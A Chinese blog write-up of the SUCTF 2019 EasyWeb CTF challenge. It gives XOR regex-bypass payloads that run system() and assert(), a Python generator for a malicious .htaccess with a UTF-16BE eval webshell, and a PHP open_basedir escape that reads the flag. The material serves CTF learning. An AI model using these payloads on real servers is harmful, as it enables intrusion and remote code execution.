[SUCTF 2019]EasyWeb

最新推荐文章于 2024-08-17 16:26:59 发布
最新推荐文章于 2024-08-17 16:26:59 发布
阅读量5.4k 收藏 2
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/102858790
版权

1. 正则绕过

这有一篇讲正则绕过的:正则绕过
因为题目限制了连字母都不能输入了,那么我们就可以用异或:就是让两个不可见字符,异或之后,就变成了我们想要的字符。很神奇,但是哪两个不可见字符,异或之后,就是我们想要的字符了?下面这个代码可以帮我们实现。

<?php
$l = "";
$r = "";
$argv = str_split("_GET");
for($i=0;$i<count($argv);$i++)
{   
    for($j=0;$j<255;$j++)
    {
        $k = chr($j)^chr(255);      \\dechex(255) = ff
        if($k == $argv[$i]){
        	if($j<16){
        		$l .= "%ff";
                $r .= "%0" . dechex($j);
        		continue;
        	}
            $l .= "%ff";
            $r .= "%" . dechex($j);
            continue;
        }
    }
}
echo "\{$l`$r\}";
?>

但我不明白为什么,不能直接把“$_POST[‘a’];” 全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替"_GET",然后配合${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&ff=phpinfo,可以执行一些函数。抛开这道题,我们还可以: http://127.0.0.1/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}("type index.php");&%ff=system
这种思想,好像是来自一位叫p神的人,他是这么构造的,这样就可以执行任何函数了。

$a = (%9e ^ %ff).(%8c ^ %ff).(%8c ^ %ff).(%9a ^ %ff).(%8d ^ %ff).(%8b ^ %ff);
\\assert
$b = "_" . (%af ^ %ff).(%b0 ^ %ff).(%ac ^ %ff).(%ab ^ %ff);$c = $$b;
\\$b = $_POST
$a($c[360]);

在这里插入图片描述

2. 文件上传

在checkin里学的,上传.user.ini来绕过的方法,在这道题里,不管用了。因为好像必须去访问PHP文件,才会去检测user.ini的设置,也好像必须在此目录下有PHP文件,不需要访问。不管哪一个,这道题都不满足。所以我们上传.htaccess文件,但是php的版本到七点儿多了,那么<script>就不能用了,而且又过滤了“<?”,那么我们就用utf-16be来绕过 ,学到了。大佬写的脚本,学习一下:

SIZE_HEADER = b"\n\n#define width 1337\n#define height 1337\n\n"

def generate_php_file(filename, script):
	phpfile = open(filename, 'wb') 

	phpfile.write(script.encode('utf-16be'))
	phpfile.write(SIZE_HEADER)

	phpfile.close()

def generate_htacess():
	htaccess = open('.htaccess', 'wb')

	htaccess.write(SIZE_HEADER)
	htaccess.write(b'AddType application/x-httpd-php .lethe\n')
	htaccess.write(b'php_value zend.multibyte 1\n')
	htaccess.write(b'php_value zend.detect_unicode 1\n')
	htaccess.write(b'php_value display_errors 1\n')

	htaccess.close()
		
generate_htacess()

generate_php_file("shell.lethe", "<?php eval($_GET['cmd']); die(); ?>")

3. open_dasedir绕过

这样我们就成功的上传的木马,并别可以解析。但是我们尝试回去跟目录下的所有文件时,发现它做了open_basedir的限制
在这里插入图片描述
我们在phpinfo里可以看见只可以访问网站根目录和/tmp目录,那么我们就要尝试绕过open_basedir:

<?php
ini_set("open_basedir","/tmp/:/var/www/html/");
mkdir("sub");
chdir("sub");
ini_set("open_basedir","..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
chdir("..");        
ini_set("open_basedir","/");
var_dump(file_get_contents("/THis_Is_tHe_F14g"));
?>

深入到/var/www/html/upload/tmp_fd40c7f4125a9b9ff1a4e75d293e3080/ 共五层,那么久写五个chdir(’…’);就可以了。原理我目前的能力还看不懂。
open_basedir绕过

https://blog.csdn.net/qq_42181428/article/details/99741920
这是别人写的题解,感觉很不错,推荐一下。

沐目_01
关注
专栏目录
2019SUCTF EasyWeb
ChenZIDu的博客
12-13 1158
open_basedir+异或+.htaccess function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userd...
CTF训练计划—[CISCN2019]Easyweb
Lemon's blog
08-14 1349
前言: 这道题学到不少知识,还卡了很长时间,单独记录一下 [CISCN2019]Easyweb 首先拿到一个登陆框,从这里就要思考是要怎么去做,我在做的时候想到三个方面去尝试 burp抓包看有什么线索没 SQL万能密码注入 页面扫描,看看有什么源码泄露或者robots.txt 前两个都行不通,刚开始页面扫描的时候也没有扫到什么,然后就彻底懵了,后来发现是工具犯病了,再扫一次就出来了 一个robots.txt文件,访问可以发现提示的是备份文件,但没说具体的文件名 就利用排除法,一个一个的去试试,目前知
[SUCTF 2019]EasySQL相关笔记
最新发布
qq_73993347的博客
08-17 247
可以看到返回了一列2,但是此题查询仅返回1,且输入数字0无回显,可以判断该题的查询语句查询的是一个bool常量,并且查询结果为0时,不会响应到网页中,那么可以判断语句无非是。字符串做布尔值时默认为false,与数字比较是默认为0,但是此题输入*,a没有回显,猜测本题后端过滤了字母,只能使用数字作答。深入探究此题,*,0可以回显flag,猜测判断符为or且右侧为永假或者0,当然这里也有可能是>-1之类的。输入>=1的数时,返回的结果始终只有1,正常情况下常量查询,应该返回的是所查询的常量,比如下图。
layui easyweb iframe v3.1.8源码
12-08
[增加] 增加fixed方式的select,可用在表格、滚动弹窗中 [增加] 增加动态模板功能 [增加] 主页工作台、控制台的内容进行了补充完善 ...[增加] loading风格增加了一个layui简约样式 ...[优化] 切换tab自动刷新支持每个子...
[D3CTF 2019]EasyWeb
07-28
- *3* [[SUCTF 2019]EasyWeb](https://blog.csdn.net/shinygod/article/details/124045024)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc...
EasyWeb框架开发的网址导航网站源码
06-20
EasyWeb框架开发的网址导航网站源码】是一款基于EasyWeb框架构建的网址导航系统,旨在为用户提供便捷的网络资源入口。这个项目的核心是利用EasyWeb框架的优势,创建一个高效、简洁且易于维护的网站。EasyWeb框架是...
[SUCTF 2019]EasyWeb 1
fmyyy1的博客
04-09 977
上来就是源码 <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir); } if(!empty($_FILES["file"])){
SUCTF2019 EasyWeb
segogt的博客
11-27 1176
SUCTF2019 EasyWeb 考察了3层内容 1.绕过正则匹配限制 $hhh = @$_GET['_']; if (!$hhh){ highlight_file(__FILE__); } if(strlen($hhh)>18){ die('One inch long, one inch strong!'); } if ( preg_match('/[\x00- 0...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值